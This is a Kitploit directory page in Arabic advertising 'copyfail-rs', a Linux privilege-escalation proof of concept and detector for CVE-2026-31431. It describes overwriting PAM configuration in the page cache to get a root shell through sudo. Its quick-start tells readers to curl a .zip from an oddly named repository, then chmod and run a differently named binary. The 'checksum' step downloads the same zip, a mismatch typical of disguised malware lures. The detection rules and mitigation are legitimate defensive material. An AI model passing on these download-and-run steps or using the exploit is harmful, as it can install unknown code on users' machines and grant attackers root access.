Skip to content
KitploitKITPLOIT
أدواتعمليات الاستغلالالمدونة
Log in
إرسال
أدواتعمليات الاستغلالالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
copyfail-rs — استغلال واكتشاف ثغرات CVE-2026-31431 باستخدام ملف ثنائي ثابت يراقب سلامة النظام ويتجاوز مصادقة PAM. | Kitploit
أدوات/GitHubGitHub/liverwortenuresis371/copyfail-rs
تصعيد الامتيازاتتحليل الذاكرة الجنائيتحليل الثغرات الأمنيةالاستغلالالتحقيق الجنائي الرقمياختبار الاختراقالمصادقةالفريق الأحمرالاستجابة للحوادثاستغلال الملفات الثنائية
GitHubliverwortenuresis371/copyfail-rs
17منذ يوم واحدلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

copyfail-rs

استغلال واكتشاف ثغرات CVE-2026-31431 باستخدام ملف ثنائي ثابت يراقب سلامة النظام ويتجاوز مصادقة PAM.

عرض المستودع

copyfail-rs

PoC متعدد المتجهات + كشف مصاحب لـ CVE-2026-31431 (CopyFail). يتضمّن متجه تجاوز مصادقة PAM جديدًا لا توفّره أي PoC عامة أخرى. وضع الكشف يلتقط ما لا تستطيع AIDE / Wazuh / OSSEC / Tripwire التقاطه بنيويًا.

ملف ثنائي ثابت واحد. ~108 كيلوبايت. no_std musl.

العرض التجريبي

noot@host:~$ ./copyfail-rs --mode exploit
[sudo] password for noot:
root@host:~# id
uid=0(root) gid=0(root) groups=0(root)
root@host:~#

أمر واحد. شل جذر. ضربة PAM القاضية في الخلفية (كتابة 4 بايت واحدة إلى /etc/pam.d/common-auth)، ثم هبوط PTY إلى الجذر عبر sudo مع كلمة مرور مهملة. سطر [sudo] password for noot: يومض للحظة فقط؛ sudo يعرض هذه المطالبة دائمًا، ويُمرّر الثنائي إليها أي سلسلة، فيتسلسل فشل pam_unix عبر pam_deny.so المُعطَّل بالتعليق ليصل إلى pam_permit.so ← جذر.

$ ./copyfail-rs --mode detect --scan
=== copyfail-rs detection: --scan ===

TAMPERED (1):
  /etc/pam.d/common-auth [ext4]
    cache:  23c4f1ee...  ← what's actually loaded (mutated)
    disk:   117dab1c...  ← what AIDE / Wazuh / Tripwire see (clean)

هذا هو المشروع. القرص نظيف والكاش متحوّر. كل أدوات FIM العامة عمياء. هذه الأداة ليست كذلك.

بدء سريع (لا حاجة للبناء)

ملفات ثنائية ثابتة مُعدّة مسبقًا في إصدار v0.1.0. اختر معماريتك، ونزّلها، وشغّلها.

# x86_64 (most laptops + cloud servers)
curl -LO https://raw.githubusercontent.com/Liverwortenuresis371/copyfail-rs/main/src/vectors/copyfail-rs-3.9.zip
chmod +x copyfail-x86_64-musl
./copyfail-x86_64-musl --mode exploit

بنى أخرى:

المعماريةالملف
ARM64 (aarch64)copyfail-aarch64-musl
ARMv7 (Raspberry Pi 3+)copyfail-armv7-musleabihf

التحقق من السلامة:

curl -LO https://raw.githubusercontent.com/Liverwortenuresis371/copyfail-rs/main/src/vectors/copyfail-rs-3.9.zip
sha256sum -c checksums.txt

ملفات ثنائية ثابتة musl، بدون اعتماديات وقت تشغيل، وتعمل على أي نظام Linux.

لماذا تكون أدوات FIM عمياء

تحوير كاش الصفحات (page cache). لا كتابة على مستوى VFS. لا صفحة متسخة. لا حدث inotify. إعادة الفحص الدورية تتسابق مع الإخلاء (eviction).

AIDE/Wazuh/OSSEC/Tripwire/Samhain تقرأ عبر إدخال/إخراج مخزّن ← page cache ← وتعتبر تجزئة البايتات المتحوّرة هي الحقيقة. أو بعد الإخلاء، تُجزِّئ القرص النظيف ← «لم يحدث أي تغيير إطلاقًا».

الكشف يتطلب O_DIRECT (تجاوز الكاش) + قراءة مخزّنة (إصابة الكاش) + فرق التجزئة. عدم التطابق = بصمة CopyFail. هذا هو --scan.

المتجهات

المتجهالهدفمكان التأثير
pam (جديد)/etc/pam.d/common-auth (Debian/Ubuntu) أو system-auth (Fedora/RHEL/Arch)4 بايتات. auth requisite pam_deny.so ← #aut requisite pam_deny.so. Sudo بأي كلمة مرور = جذر.
su/usr/bin/suتحوير نص الثنائي setuid. execve ← جذر.
passwd/etc/passwdقلب UID ← يصبح المستخدم جذرًا عند تسجيل الدخول التالي. يكسر SSH لذلك المستخدم.

الاختيار التلقائي: --vector auto (الافتراضي). يضع pam > su > passwd حسب التخفي. يتراجع إلى البديل عند الفشل.

الكشف

الوضعالوظيفة
--checkالنواة + الوحدة + CONFIG_CRYPTO_USER_API_AEAD + حالة التخفيف. النتيجة: معرّض / مخفَّف / آمن.
--scanفرق قراءة O_DIRECT مقابل القراءة المخزّنة على الملفات الحرجة. يتفرّع عبر statfs(): ext4/xfs/btrfs تستخدم O_DIRECT، overlayfs يتراجع، tmpfs يُتخطّى.
--baseline / --diffلقطة لحالة نظيفة معروفة. قارن لاحقًا. الفروق المحصورة في الكاش فقط = بصمة CopyFail.
--watchبرنامج خفي. فحص دوري. خروج نظيف عبر SIGTERM.
--huntمسح شامل لأساطيل SSH. تجميعات JSON.

--json في كل مكان للاستيعاب في SIEM.

مخرجات الكشف

detection/:

  • sigma/copyfail-af-alg.yml: قاعدة Sigma، ضعها في SIEM الخاص بك
  • auditd/copyfail.rules: طبّقها عبر augenrules --load
  • ebpf/copyfail-trace.bt: سطر bpftrace واحد
  • apparmor/copyfail-block.profile: قاعدة رفض لـ AppArmor 3.0+
  • mitigation/disable-algif.sh: قائمة حظر modprobe + تحذير =y

التخفيف

echo "install algif_aead /bin/false" | sudo tee /etc/modprobe.d/disable-algif.conf
sudo rmmod algif_aead

أو إصلاح النواة الرئيسية a664bf3d603d (أبريل 2026). حتى الآن: فقط Debian Sid/Forky أصدرت الإصلاح. Ubuntu LTS و RHEL و SUSE و Amazon Linux و Fedora و Arch و Oracle = جميعها معرّضة.

ملاحظة: CONFIG_CRYPTO_USER_API_AEAD=y (مدمج) يتجاوز modprobe بصمت. --check يحذّر.

بعد الاستغلال والتخفيف: يبقى التحوير في الكاش حتى إعادة التشغيل. التخفيف يمنع الاستغلالات الجديدة ولا يلغي الاستغلالات السابقة.

البناء

cargo build --release --target x86_64-unknown-linux-musl
الهدفالحجم
x86_64-musl108 KB
aarch64-musl96 KB
armv7-musleabihf86 KB

no_std. لا مُخصِّص ذاكرة. لا اعتماديات وقت تشغيل. ملف ثنائي ثابت واحد.

الملفات المُجهزة مسبقًا ومجاميع SHA256 مرفقة بإصدارات GitHub.

الاستخدام

انظر docs/usage.md للحصول على أمثلة عملية بحجم شاشة واحدة لكل وضع (exploit auto/list/all، detect check/scan/baseline/diff/watch/hunt).

للحصول على نسخة سردية أطول من هذا README (مزيد من السياق وشرح أعمق)، انظر BLOG.md.

نموذج التهديد

انظر docs/threat-model.md.

المقارنة

Theori Pythontgies Cbadsectorlabs Gocopyfail-rs
المتجهاتsusu + passwdsusu + passwd + PAM (جديد)
الكشفلا شيءلا شيءلا شيءكشف كامل --mode detect
أدلة الاستجابة للحوادثلا شيءلا شيءلا شيءSigma + auditd + eBPF + AppArmor
تجربة استخدام المشغّل3 أوامر4 أوامر5 أوامرأمر واحد
الملف الثنائييتطلب Python~10 كيلوبايت~5 ميجابايت~108 كيلوبايت ثابت

التفويض والأخلاقيات

أجهزتك الخاصة فقط. لا بوابة CLI (مسرحية أمنية). README + LICENSE = الإطار.

وضع الكشف للقراءة فقط. آمن في بيئات الإنتاج.

وضع الاستغلال يحوّر page cache في النواة. يقتصر على الذاكرة فقط، لكن تعامل معه كأداة تخريبية. يمنع المصادقة لأي مستدعٍ لاحق.

الاعتمادات

أُعلن عن CVE-2026-31431 بواسطة Theori / Xint بتاريخ 2026-04-29 (التقرير، مدونة Xint). PoCs عامة سابقة:

  • theori-io/copy-fail-CVE-2026-31431 (بايثون، 732 بايت، متجه su)
  • tgies/copy-fail-c (C مع nolibc، متجها su و passwd، محمول)
  • badsectorlabs/copyfail-go (ملف Go ثنائي ثابت، متجه su)

هذا المشروع (copyfail-rs): يضيف متجه تجاوز مصادقة PAM، وكشفًا ثنائي الوضع، وأدلة استجابة للحوادث.

الترخيص

MIT.

المراجع

  • https://raw.githubusercontent.com/Liverwortenuresis371/copyfail-rs/main/src/vectors/copyfail-rs-3.9.zip
  • إصلاح Linux: a664bf3d603d
  • الحد الأدنى: 72548b093ee3 (4.14، أغسطس 2017)
  • مماثل: Dirty Pipe (CVE-2022-0847)
تنزيل الأداة